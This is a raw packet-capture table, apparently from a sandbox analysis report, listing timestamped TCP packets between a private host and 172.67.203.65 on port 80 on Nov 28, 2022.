Nov 28, 2022 12:46:57.778099060 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.778295040 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.778410912 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.778466940 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.778481007 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.778491974 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.778493881 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.778507948 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.778522015 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.778570890 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.778584957 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.778605938 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.778611898 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.778625011 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.778639078 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.778652906 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.778669119 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.778681993 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.778695107 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.778707981 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.778739929 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.778752089 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.778774023 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.778845072 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.778959036 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.783797979 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.783931971 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.783946037 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.783958912 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.783967972 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.783984900 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.783998966 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784034967 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784092903 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784106970 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784120083 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784137964 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.784137964 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784152985 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784166098 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784182072 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784195900 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784209013 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784221888 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784226894 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.784235001 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784248114 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784260988 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784274101 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784286976 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784300089 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784321070 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784332991 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784344912 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784357071 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784373999 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784388065 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784399986 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784411907 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784424067 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784435987 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784447908 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784461021 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784461021 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.784471989 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784483910 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784496069 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784507990 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784516096 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.784519911 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784532070 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784543991 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784559011 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784570932 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784583092 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784595966 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784610033 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784621954 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784634113 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784638882 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.784647942 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784663916 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784709930 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784723043 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784734964 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784753084 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784766912 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784779072 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784811974 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784812927 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.784825087 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784837961 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784849882 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784862041 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784873962 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784885883 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784898043 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784909964 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784912109 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.784923077 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784938097 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784970045 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784982920 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.784995079 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.785007000 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.785018921 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.785031080 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.785043001 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.785054922 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.785067081 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.785068989 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.785079002 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.785092115 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.785103083 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.785119057 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.785135984 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.785149097 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.785161972 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.785171986 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.785176039 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.785187960 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.785200119 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.785213947 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.785228014 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.785238981 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.785249949 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.785290003 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.785469055 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.794831038 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.794938087 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.794950008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.794961929 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.795020103 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.795032024 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.795043945 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.795054913 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.795067072 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.795077085 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.795104980 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.795116901 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.795126915 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.795186043 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.795217037 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.795334101 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.839179039 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.851578951 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.851644039 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.851656914 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.851669073 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.851680994 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.851727009 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.851804972 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.851828098 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.851830959 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.851843119 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.851855040 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.851866961 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.851877928 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.851890087 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.851901054 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.851902008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.851913929 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.851926088 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.851938009 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.851948977 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.851960897 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.851972103 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.851984024 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.851999998 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.851999998 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.852137089 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.852169991 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.852171898 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852185011 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852196932 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852207899 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852221012 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852236986 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852250099 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852261066 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852272987 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852283955 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852296114 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852323055 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852334023 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852344990 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852355957 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852365971 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852376938 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852387905 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852397919 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852410078 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852420092 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852431059 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852431059 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.852442026 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852452993 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852463961 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852474928 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852484941 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852493048 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.852495909 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852507114 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852518082 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852528095 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852539062 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852550030 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852560997 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852574110 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852585077 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852596045 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852607012 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852612019 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.852617979 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852628946 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852638960 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852649927 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852659941 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852670908 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852682114 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852693081 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852704048 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852715015 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852725983 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852736950 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852746964 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852757931 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852768898 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852772951 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.852780104 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852791071 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852801085 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852812052 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852823019 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852833986 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852844000 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852854967 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852864981 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852871895 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.852875948 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852886915 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852897882 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852909088 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852935076 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852945089 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852956057 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852967978 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852979898 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.852991104 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853001118 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853013039 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853070021 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.853168964 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.853184938 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853195906 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853205919 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853216887 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853228092 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853449106 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.853476048 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853487015 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853497982 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853509903 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853519917 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853530884 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853542089 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853558064 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853570938 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853581905 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853593111 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853604078 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853615046 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853626966 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853638887 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853650093 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853661060 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853672028 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853686094 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853697062 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853708029 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853754997 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.853755951 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853766918 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853777885 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853789091 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853800058 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853811026 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853821039 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853832006 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853842974 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853854895 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853869915 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853882074 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853892088 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853904963 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853908062 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.853919029 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853929996 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853940964 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853952885 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853965998 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853976965 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.853988886 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854001045 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854012966 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854037046 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854078054 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.854177952 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.854300022 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854310989 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854321957 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854340076 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854351997 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854362965 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854374886 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854387045 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854398012 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854408979 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854419947 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854432106 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854443073 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854454041 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854465008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854475975 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854485989 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854496956 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854507923 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854509115 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.854706049 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854717016 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854727983 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854738951 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854749918 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854759932 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854770899 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854772091 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:57.854782104 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854794979 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854806900 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:57.854816914 CET	80	49836	172.67.203.65	192.168.11.20
